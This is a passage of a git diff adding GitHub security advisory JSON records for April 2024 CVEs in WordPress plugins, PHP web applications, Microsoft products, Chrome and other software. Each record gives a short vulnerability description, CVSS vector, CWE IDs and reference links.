"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3418" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-03.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259590" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259590" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311596" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fr6q-c249-g62p/GHSA-fr6q-c249-g62p.json b/advisories/unreviewed/2024/04/GHSA-fr6q-c249-g62p/GHSA-fr6q-c249-g62p.json new file mode 100644 index 00000000000..65741efcfd0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fr6q-c249-g62p/GHSA-fr6q-c249-g62p.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fr6q-c249-g62p", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2112" + ], + "details": "The Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.15.22 via the signature functionality. This makes it possible for unauthenticated attackers to extract sensitive data including user signatures.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2112" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/form-maker/tags/1.15.22&old=3057012&new_path=/form-maker/tags/1.15.23&new=3057012&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5652f9c3-3cc9-4541-8209-40117b4d25d9?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-frjv-mxj9-42h2/GHSA-frjv-mxj9-42h2.json b/advisories/unreviewed/2024/04/GHSA-frjv-mxj9-42h2/GHSA-frjv-mxj9-42h2.json new file mode 100644 index 00000000000..650e590d054 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-frjv-mxj9-42h2/GHSA-frjv-mxj9-42h2.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frjv-mxj9-42h2", + "modified": "2024-04-08T15:30:34Z", + "published": "2024-04-08T15:30:34Z", + "aliases": [ + "CVE-2024-3443" + ], + "details": "A vulnerability classified as problematic was found in SourceCodester Prison Management System 1.0. This vulnerability affects unknown code of the file /Employee/apply_leave.php. The manipulation of the argument txtstart_date/txtend_date leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259696.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3443" + }, + { + "type": "WEB", + "url": "https://github.com/zyairelai/CVE-submissions/blob/main/prison-xss.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259696" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259696" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312285" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fv9f-467f-xm3f/GHSA-fv9f-467f-xm3f.json b/advisories/unreviewed/2024/04/GHSA-fv9f-467f-xm3f/GHSA-fv9f-467f-xm3f.json new file mode 100644 index 00000000000..50379c70d28 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fv9f-467f-xm3f/GHSA-fv9f-467f-xm3f.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fv9f-467f-xm3f", + "modified": "2024-04-08T00:30:46Z", + "published": "2024-04-08T00:30:46Z", + "aliases": [ + "CVE-2021-47208" + ], + "details": "The Mojolicious module before 9.11 for Perl has a bug in format detection that can potentially be exploited for denial of service.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47208" + }, + { + "type": "WEB", + "url": "https://github.com/mojolicious/mojo/issues/1736" + }, + { + "type": "WEB", + "url": "https://github.com/mojolicious/mojo/commit/a0c4576ffb11c235088550de9ba7ac4196e1953c" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T00:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fvg7-9wxr-q3x3/GHSA-fvg7-9wxr-q3x3.json b/advisories/unreviewed/2024/04/GHSA-fvg7-9wxr-q3x3/GHSA-fvg7-9wxr-q3x3.json new file mode 100644 index 00000000000..61fdf112dc7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fvg7-9wxr-q3x3/GHSA-fvg7-9wxr-q3x3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fvg7-9wxr-q3x3", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-27911" + ], + "details": "A vulnerability was reported in some Lenovo Printers that could allow an unauthenticated attacker to obtain the administrator password.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27911" + }, + { + "type": "WEB", + "url": "https://iknow.lenovo.com.cn/detail/420425" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fvm8-pgm7-cg8j/GHSA-fvm8-pgm7-cg8j.json b/advisories/unreviewed/2024/04/GHSA-fvm8-pgm7-cg8j/GHSA-fvm8-pgm7-cg8j.json new file mode 100644 index 00000000000..e54d544319b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fvm8-pgm7-cg8j/GHSA-fvm8-pgm7-cg8j.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fvm8-pgm7-cg8j", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2654" + ], + "details": "The File Manager plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 7.2.5 via the fm_download_backup function. This makes it possible for authenticated attackers, with administrator access and above, to read the contents of arbitrary zip files on the server, which can contain sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2654" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-file-manager/trunk/file_folder_manager.php#L1353" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3062387/wp-file-manager/trunk?contextall=1&old=3051451&old_path=%2Fwp-file-manager%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ca98fbc6-8cfa-4997-8a46-344afb75a97e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fvm9-r7wp-vc8g/GHSA-fvm9-r7wp-vc8g.json b/advisories/unreviewed/2024/04/GHSA-fvm9-r7wp-vc8g/GHSA-fvm9-r7wp-vc8g.json new file mode 100644 index 00000000000..b7b1efdc758 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fvm9-r7wp-vc8g/GHSA-fvm9-r7wp-vc8g.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fvm9-r7wp-vc8g", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28906" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28906" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28906" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fvp5-7g7m-vxw4/GHSA-fvp5-7g7m-vxw4.json b/advisories/unreviewed/2024/04/GHSA-fvp5-7g7m-vxw4/GHSA-fvp5-7g7m-vxw4.json new file mode 100644 index 00000000000..44d3daba666 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fvp5-7g7m-vxw4/GHSA-fvp5-7g7m-vxw4.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fvp5-7g7m-vxw4", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-3536" + ], + "details": "A vulnerability has been found in Campcodes Church Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/delete_log.php. The manipulation of the argument selector leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259906 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3536" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Church%20Management%20System/Church%20Management%20System%20-%20vuln%203.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259906" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259906" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312537" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T04:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fw35-8hjm-jw2p/GHSA-fw35-8hjm-jw2p.json b/advisories/unreviewed/2024/04/GHSA-fw35-8hjm-jw2p/GHSA-fw35-8hjm-jw2p.json new file mode 100644 index 00000000000..0c70851f643 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fw35-8hjm-jw2p/GHSA-fw35-8hjm-jw2p.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fw35-8hjm-jw2p", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-27477" + ], + "details": "In Leantime 3.0.6, a Cross-Site Scripting vulnerability exists within the ticket creation and modification functionality, allowing attackers to inject malicious JavaScript code into the title field of tickets (also known as to-dos). This stored XSS vulnerability can be exploited to perform Server-Side Request Forgery (SSRF) attacks.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27477" + }, + { + "type": "WEB", + "url": "https://drive.proton.me/urls/35CKB8RV04#sEubCKVOuXqt" + }, + { + "type": "WEB", + "url": "https://github.com/Leantime/leantime/blob/264a7dbc2c9b18f574821bf27dd568a287ee8498/app/Domain/Tickets/Controllers/ShowTicket.php#L20" + }, + { + "type": "WEB", + "url": "https://github.com/dead1nfluence/Leantime-POC/blob/main/README.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T15:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-fxc7-vj9h-93hg/GHSA-fxc7-vj9h-93hg.json b/advisories/unreviewed/2024/04/GHSA-fxc7-vj9h-93hg/GHSA-fxc7-vj9h-93hg.json new file mode 100644 index 00000000000..af5a001ff61 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-fxc7-vj9h-93hg/GHSA-fxc7-vj9h-93hg.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fxc7-vj9h-93hg", + "modified": "2024-04-08T18:30:48Z", + "published": "2024-04-08T18:30:48Z", + "aliases": [ + "CVE-2024-3457" + ], + "details": "A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3. This affects an unknown part of the file /admin/config_ISCGroupNoCache.php. The manipulation of the argument GroupId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259713 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3457" + }, + { + "type": "WEB", + "url": "https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-nconfig_ISCGroupNoCache.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259713" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259713" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312184" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g2p3-5v58-cqcv/GHSA-g2p3-5v58-cqcv.json b/advisories/unreviewed/2024/04/GHSA-g2p3-5v58-cqcv/GHSA-g2p3-5v58-cqcv.json new file mode 100644 index 00000000000..55550f5f3d7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g2p3-5v58-cqcv/GHSA-g2p3-5v58-cqcv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g2p3-5v58-cqcv", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-29055" + ], + "details": "Microsoft Defender for IoT Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29055" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29055" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g2vx-prh9-62c4/GHSA-g2vx-prh9-62c4.json b/advisories/unreviewed/2024/04/GHSA-g2vx-prh9-62c4/GHSA-g2vx-prh9-62c4.json new file mode 100644 index 00000000000..c3b278a53c4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g2vx-prh9-62c4/GHSA-g2vx-prh9-62c4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g2vx-prh9-62c4", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-26180" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26180" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26180" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g36v-5299-38pr/GHSA-g36v-5299-38pr.json b/advisories/unreviewed/2024/04/GHSA-g36v-5299-38pr/GHSA-g36v-5299-38pr.json new file mode 100644 index 00000000000..130a29c2479 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g36v-5299-38pr/GHSA-g36v-5299-38pr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g36v-5299-38pr", + "modified": "2024-04-05T18:30:33Z", + "published": "2024-04-05T18:30:33Z", + "aliases": [ + "CVE-2023-48426" + ], + "details": "u-boot bug that allows for u-boot shell and interrupt over UART\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48426" + }, + { + "type": "WEB", + "url": "https://source.android.com/docs/security/bulletin/chromecast/2023-12-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T16:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g42r-4xc7-377c/GHSA-g42r-4xc7-377c.json b/advisories/unreviewed/2024/04/GHSA-g42r-4xc7-377c/GHSA-g42r-4xc7-377c.json new file mode 100644 index 00000000000..459d713020c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g42r-4xc7-377c/GHSA-g42r-4xc7-377c.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g42r-4xc7-377c", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29747" + ], + "details": "In _dvfs_get_lv of dvfs.c, there is a possible out of bounds read due to a missing null check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29747" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g44m-x5h7-fr5q/GHSA-g44m-x5h7-fr5q.json b/advisories/unreviewed/2024/04/GHSA-g44m-x5h7-fr5q/GHSA-g44m-x5h7-fr5q.json new file mode 100644 index 00000000000..5e59f00854b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g44m-x5h7-fr5q/GHSA-g44m-x5h7-fr5q.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g44m-x5h7-fr5q", + "modified": "2024-04-09T18:30:22Z", + "published": "2024-04-09T18:30:22Z", + "aliases": [ + "CVE-2024-31865" + ], + "details": "Improper Input Validation vulnerability in Apache Zeppelin.\n\nThe attackers can call updating cron API with invalid or improper privileges so that the notebook can run with the privileges.\n\nThis issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.\n\nUsers are recommended to upgrade to version 0.11.1, which fixes the issue.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31865" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4631" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/slm1sf0slwc11f4m4r0nd6ot2rf7w81l" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g459-f54g-xh4f/GHSA-g459-f54g-xh4f.json b/advisories/unreviewed/2024/04/GHSA-g459-f54g-xh4f/GHSA-g459-f54g-xh4f.json new file mode 100644 index 00000000000..8bb26ca00bd --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g459-f54g-xh4f/GHSA-g459-f54g-xh4f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g459-f54g-xh4f", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-29047" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29047" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29047" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g47c-q844-rxj3/GHSA-g47c-q844-rxj3.json b/advisories/unreviewed/2024/04/GHSA-g47c-q844-rxj3/GHSA-g47c-q844-rxj3.json new file mode 100644 index 00000000000..c48cc8ee86f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g47c-q844-rxj3/GHSA-g47c-q844-rxj3.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g47c-q844-rxj3", + "modified": "2024-04-06T15:30:27Z", + "published": "2024-04-06T15:30:27Z", + "aliases": [ + "CVE-2024-3156" + ], + "details": "Inappropriate implementation in V8 in Google Chrome prior to 123.0.6312.105 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3156" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/329130358" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T15:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g47h-q6pp-ww7f/GHSA-g47h-q6pp-ww7f.json b/advisories/unreviewed/2024/04/GHSA-g47h-q6pp-ww7f/GHSA-g47h-q6pp-ww7f.json new file mode 100644 index 00000000000..896727af6a2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g47h-q6pp-ww7f/GHSA-g47h-q6pp-ww7f.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g47h-q6pp-ww7f", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2023-6486" + ], + "details": "The Spectra – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS metabox in all versions up to and including 2.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6486" + }, + { + "type": "WEB", + "url": "https://advisory.abay.sh/cve-2023-6486" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3042670%40ultimate-addons-for-gutenberg%2Ftrunk&old=3037142%40ultimate-addons-for-gutenberg%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d4933a30-974f-487d-9444-b0ea1283a09c?source=cve" + }, + { + "type": "WEB", + "url": "https://youtu.be/t5K745dBsT0" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g4rj-2pvr-77xv/GHSA-g4rj-2pvr-77xv.json b/advisories/unreviewed/2024/04/GHSA-g4rj-2pvr-77xv/GHSA-g4rj-2pvr-77xv.json new file mode 100644 index 00000000000..4abcb2269b7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g4rj-2pvr-77xv/GHSA-g4rj-2pvr-77xv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4rj-2pvr-77xv", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-23592" + ], + "details": "An authentication bypass vulnerability was reported in Lenovo devices with Synaptics fingerprint readers that could allow an attacker with physical access to replay fingerprints and bypass Windows Hello authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23592" + }, + { + "type": "WEB", + "url": "https://support.lenovo.com/us/en/product_security/LEN-155804" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-358" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g6h9-ww5f-gjp4/GHSA-g6h9-ww5f-gjp4.json b/advisories/unreviewed/2024/04/GHSA-g6h9-ww5f-gjp4/GHSA-g6h9-ww5f-gjp4.json new file mode 100644 index 00000000000..f8cce012dae --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g6h9-ww5f-gjp4/GHSA-g6h9-ww5f-gjp4.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g6h9-ww5f-gjp4", + "modified": "2024-04-08T00:30:46Z", + "published": "2024-04-08T00:30:46Z", + "aliases": [ + "CVE-2024-3431" + ], + "details": "A vulnerability was found in EyouCMS 1.6.5. It has been declared as critical. This vulnerability affects unknown code of the file /login.php?m=admin&c=Field&a=channel_edit of the component Backend. The manipulation of the argument channel_id leads to deserialization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259612. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3431" + }, + { + "type": "WEB", + "url": "https://terrific-street-3d0.notion.site/EYOUCMS-v1-6-5-RCE-7fe12e91a9b249e88e6ab36446b5ba22" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259612" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259612" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.308208" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T22:15:09Z" + } +} \ No newline at end of file diff --git 